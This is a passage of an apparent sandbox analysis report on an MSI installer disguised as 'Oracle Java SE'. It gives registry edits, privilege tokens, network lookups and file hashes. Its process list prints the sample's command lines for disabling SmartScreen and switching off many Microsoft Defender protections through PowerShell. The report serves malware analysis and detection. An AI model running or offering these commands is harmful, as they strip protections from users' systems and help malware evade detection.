| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 674D0B963080012894E3DF4CB73C27AF
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 30B3AA91DCE7877DF4C02F3D55173702 E Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Windows\syswow64\cmd.exe
"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\smartscreen.exe" /a
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /reset
C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
Register.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 2.18.63.21:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| N/A | 127.0.0.1:50543 | | tcp |
| N/A | 127.0.0.1:50551 | | tcp |
| N/A | 127.0.0.1:50553 | | tcp |
| N/A | 127.0.0.1:50556 | | tcp |
| US | 8.8.8.8:53 | websekir.com | udp |
| N/A | 127.0.0.1:50559 | | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | 3d3ac8653b5eeb7eaba019b50df5f3d0 |
| SHA1 | 57dfe18b28a76cfadb4cc80f53d559cf8868728d |
| SHA256 | e7a9369455a1f1f355faf65b0bb322ffc40741d19df44b2a982cd69f0322709a |
| SHA512 | 8d37b115a91b960ce47504e03bff45ae6bbdf1cec782cf6a69ea348fb91845adda04761a067d26df36ba322b4d784bf7ee2fac76db9cc5334db14e3059d6458c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | e8506a7a82d6d66cb76937576ae2eda7 |
| SHA1 | a3cb771a9a410caaf4e9bb527d02254d41d3169d |
| SHA256 | eb33b432e411b73f127bac67178fd05c9336fcf444973c8e8dcf997fc711bd7d |
| SHA512 | 8eea374485b45af2b50870ee58fd91b7275e050782df5c506e91d3e77c77e68dabf1bbc970d6ddc35a4fc1ea8d4d93900954b64e2303d471354305d2089ae12b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | 7fa35b9b26d35986602214ca1a5a8123 |
| SHA1 | 300297298df1d3bd5b5c0c1c5bb782132bc98df2 |
| SHA256 | 70497b384024f1c0d6950a75f41cfed50292ac8408cd47b47e04b7c375358486 |
| SHA512 | df5edae4399b49fc522a54f5e3cfc287dce17cf3d66103d361f56fd289894dfde258b42266e5837505ef1ea9ab440625129ebfafd41775a32652837014190da6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4
| MD5 | d67d0ea2202bf0994c7d74e568bb241d |
| SHA1 | 1aa2f3b799b490e5ec7d538995d7e459094134eb |
| SHA256 | afe0fcf076f4a87deac1a79d1624f7d5bcf2fd79168eb073ddfd8128c77f6802 |
| SHA512 | 48f4ef76389f47ba5404edfad362236185a5edfecb772f520078d1554daab797dac97f432a2367895e81d1da63a8ba3d3c075fca704f55dc9780af300e9e84fb |
C:\Windows\Installer\MSI77C1.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | a27bdbc102aa90a99bc5538bb271b4d3 |
| SHA1 | eb18ea9eee793aa76eab49feea0e6490c4ded61e |
| SHA256 | e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de |
| SHA512 | cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
| MD5 | 888aa12cc20f645dd2fc04f52e453bc6 |
| SHA1 | b19e790c9e6ceface9cdd41a24518d6e4a953b23 |
| SHA256 | 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb |
| SHA512 | f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
| MD5 | b3c188281aa3998f49391da0c3b52b8e |
| SHA1 | 67e6f1eb07861dddde3df9d266f683cb0331d433 |
| SHA256 | 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46 |
| SHA512 | 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat
| MD5 | 0a16033c7df6ba580e33c66fed1a12d7 |
| SHA1 | 50fc0b9f740a9e82717f2370fe0a15e937a84208 |
| SHA256 | 08d68557b06a5cb43ce2719bf82dd2fee6bd78a58c88a37e5ee5d54b2ea14623 |
| SHA512 | c252e11099d52bc57bd49ce5732a7cd5fcbd155b36e0b0b27a3e8a3023949708362e4156e09f467b35c27543a652173a8dbe29da13dbdb23ecd2354c95569b44 |
memory/1800-84-0x0000000003110000-0x0000000003146000-memory.dmp
memory/5080-85-0x0000000004FB0000-0x00000000055D8000-memory.dmp
